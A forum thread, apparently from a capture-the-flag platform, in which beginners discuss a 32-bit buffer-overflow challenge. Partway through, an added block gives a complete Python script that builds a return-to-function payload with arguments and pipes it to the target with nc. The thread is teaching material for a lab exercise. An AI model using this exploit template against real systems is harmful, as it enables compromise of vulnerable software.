[pwn] You know 0xDiablos

I would be interested if someone could give me some tips too; I'm a noob and need help to get started, thanks a lot.

Hi guys,

Could anyone help me out… or just point me to the right resources… I'm extremely new at this… (I'm doing the Beginner Track)

I've got the buffer size figured out, the address of the function to go to… I'm trying to put it on the ISP.
Am I on the right path?

I know I need some params… where should I put those…

I’m really lost… thanks a lot…

I don't want the answer, I want help.

I think I'm very close to getting the flag.
Locally everything works just fine (even the part with the params), but when I try to send my payload to the server, nothing happens. I’m probably screwing up something with my script.

Can anybody give me a nudge in PM?

@7h3B4dg3r said:

I think I'm very close to getting the flag.
Locally everything works just fine (even the part with the params), but when I try to send my payload to the server, nothing happens. I’m probably screwing up something with my script.

Can anybody give me a nudge in PM?

Nevermind, I did it. :slight_smile:

I feel I’m on the right track, but I just can’t get the payload right. I’m pretty sure I’ve gotten the correct buffer size (I’ve verified using a debugger), and I know the address of what I want to call with params.
When I enter my payload and run it through a debugger, the address is wrong in the debugger, even though it’s correct in the input. Instead of ‘e2’ it’s showing as ‘c2’.
I’d appreciate anything you could throw my way to help get me going.

I could use a nudge. I can get "Hurry up and try…" but when I try on the instance I get nothing. I see the parameters required. I tried putting them in right behind my address… let's say param1 = A, param2 = B

JUNK+A+B+ADDRESS
JUNK+B+A+ADDRESS

Neither worked. I also tried the values of A and B forwards/backwards. Can anyone help with passing the parameters? Thanks

@pythonK said:

I feel I’m on the right track, but I just can’t get the payload right. I’m pretty sure I’ve gotten the correct buffer size (I’ve verified using a debugger), and I know the address of what I want to call with params.
When I enter my payload and run it through a debugger, the address is wrong in the debugger, even though it’s correct in the input. Instead of ‘e2’ it’s showing as ‘c2’.
I’d appreciate anything you could throw my way to help get me going.

I figured out my problem. The way python3 was sending the info was wrong, but python2 sends it correctly. Still haven't solved it yet, but I'm closer.

Just started this and I feel like I'm heading in the right direction.
I'm sending my payload with all parameters but still don't manage to get the fl…t.t file,
although I've created it locally.

Could use a nudge (:
thanks

got it! nice one!

I got the flag… but it only works some of the time? I thankfully ran my code a few times after double checking things, and poof, flag showed up when it didn’t on the first couple runs.

Running it again, it doesn’t show up. Is this intentional, or is there something funny going on?

got it! thanks @BLAMO last piece i wasn’t getting. It makes sense now. anyone need a hand hit me up.

The tips here were definitely useful. If you haven't done a BOF before (which I have seen mentioned here a few times, so I'm assuming it's not a spoiler) you should definitely look up a tutorial and understand that before trying this. A few things that were time wasters for me:

1: If you are going to use Python to automate your exploit, for the love of god use python2. I ran into some weird issues trying to get my payload to function properly, which I am assuming is because Python3 changed how they handle strings.

2: There may be extra bytes in places you don't expect: c - Why is ebx saved in the stack frame of a simple function, calling gets? - Stack Overflow

Got the flag :). Could anyone get this exploit to work in Python 3? I managed to do it with Python 2 in the end, but would’ve liked to do it in Python 3…
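Since two questions keep coming up in this thread (where the two parameters go relative to the overwritten return address, and why the same payload works in Python 2 but not Python 3), here is an added example, not posted by anyone in the thread, showing both. It builds a 32-bit cdecl ret2func payload as raw bytes and shows what happens to a byte such as 0xe2 when the payload is built as a Python 3 str instead. The offset, function address and argument values are placeholders, not the challenge's real ones; measure your own in a debugger.

```python
import struct
import sys

# Placeholder values, NOT the challenge's real ones: the offset is whatever your
# debugger showed you, the address is the function you want to return into, and
# the two integers are whatever that function compares its arguments against.
OFFSET = 100
FUNC_ADDR = 0x0804ABCD
ARG1 = 0x11111111
ARG2 = 0x22222222


def p32(value):
    """Pack an integer as 4 little-endian bytes, the way a 32-bit x86 stack slot holds it."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_payload(offset, func_addr, args, fake_ret=0x41414141):
    """Return a ret2func payload for a 32-bit cdecl target.

    Stack after the overflow, from low to high address:
        [padding][func_addr][fake return][arg1][arg2]...
    When the vulnerable function executes 'ret', func_addr is popped into EIP.
    The target then sees fake_ret where its own return address belongs and
    reads its parameters at 4(%esp), 8(%esp), ... so the arguments go AFTER
    the fake return slot, not in front of the address.
    """
    payload = b"A" * offset            # everything up to the saved EIP
    payload += p32(func_addr)          # overwrites the saved EIP
    payload += p32(fake_ret)           # return address the target will see
    for value in args:                 # parameters, first argument first
        payload += p32(value)
    return payload


def encode_high_byte(byte_value):
    """Show why a Python 3 str payload corrupts bytes >= 0x80.

    Returns (what str.encode() produces, what you actually wanted).
    chr(0xe2).encode() is b'\\xc3\\xa2', so the target receives two bytes
    instead of one: the payload grows and the saved EIP no longer lands
    where you measured it.
    """
    return chr(byte_value).encode("utf-8"), bytes([byte_value])


def describe(payload, offset):
    """Map each 4-byte slot after the padding to its role, for checking against gdb."""
    roles = ["EIP", "fake ret"]
    out = []
    for i in range(offset, len(payload), 4):
        slot = (i - offset) // 4
        role = roles[slot] if slot < len(roles) else "arg%d" % (slot - 1)
        out.append((role, struct.unpack("<I", payload[i:i + 4])[0]))
    return out


if __name__ == "__main__":
    payload = build_payload(OFFSET, FUNC_ADDR, [ARG1, ARG2])
    # Write raw bytes, never a str, so nothing is re-encoded on the way out:
    #   python3 exploit.py | ./vuln           (local)
    #   python3 exploit.py | nc HOST PORT     (remote)
    sys.stdout.buffer.write(payload + b"\n")
```

Two practical caveats: the offset is a parameter rather than the buffer's declared size because the compiler may save extra registers (the saved ebx from the Stack Overflow link above) between the buffer and the return address; and since the input is read by gets(), a 0x0a byte anywhere in an address or argument ends the read early, which is worth checking before blaming the script.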

I've never done a BUF before and I'm trying to read through assembly documentation, but I think I have the right idea. I've made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could PM me a hint or something that would be great. I also don't know where to put variables.

@Oscuridad said:

I've never done a BUF before and I'm trying to read through assembly documentation, but I think I have the right idea. I've made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could PM me a hint or something that would be great. I also don't know where to put variables.

Send me the exploit on Discord: "Alex Zander#0764"

I’m confused, I’m testing a BOF, and successfully overwriting EIP in a VM, but doing the same on a physical box doesn’t work?

ASLR is off on both…

Same length payload of 'A's, then 4 * 'B', and 4 * 'C's.

On the VM: EIP gets 'BBBB', with ESP at 'CCCC'.
On the physical box: EIP gets 'AAAA', with ESP at 'BBBBCCCC'?

Environments were NOT the same! Lesson learned. Problem solved.

I am really confused. In a Kali VM, using gdb/gef/pwntools, after many hours I finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A's string echoed back. Playing with the length of those 'A's I will get the same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

@Baseizo7 said:

I am really confused. In a Kali VM, using gdb/gef/pwntools, after many hours I finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A's string echoed back. Playing with the length of those 'A's I will get the same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Never mind! Figured it out. h4x0r error. Apparently I have trouble noticing glaring numerical typos right in front of me for hours.

Hi,
can anybody give me any help, please?
I have a payload without bad characters and I go through gdb+peda, but I can't make it work even locally.
I redirect EIP to the method with both parameters but still no success.
Thanks.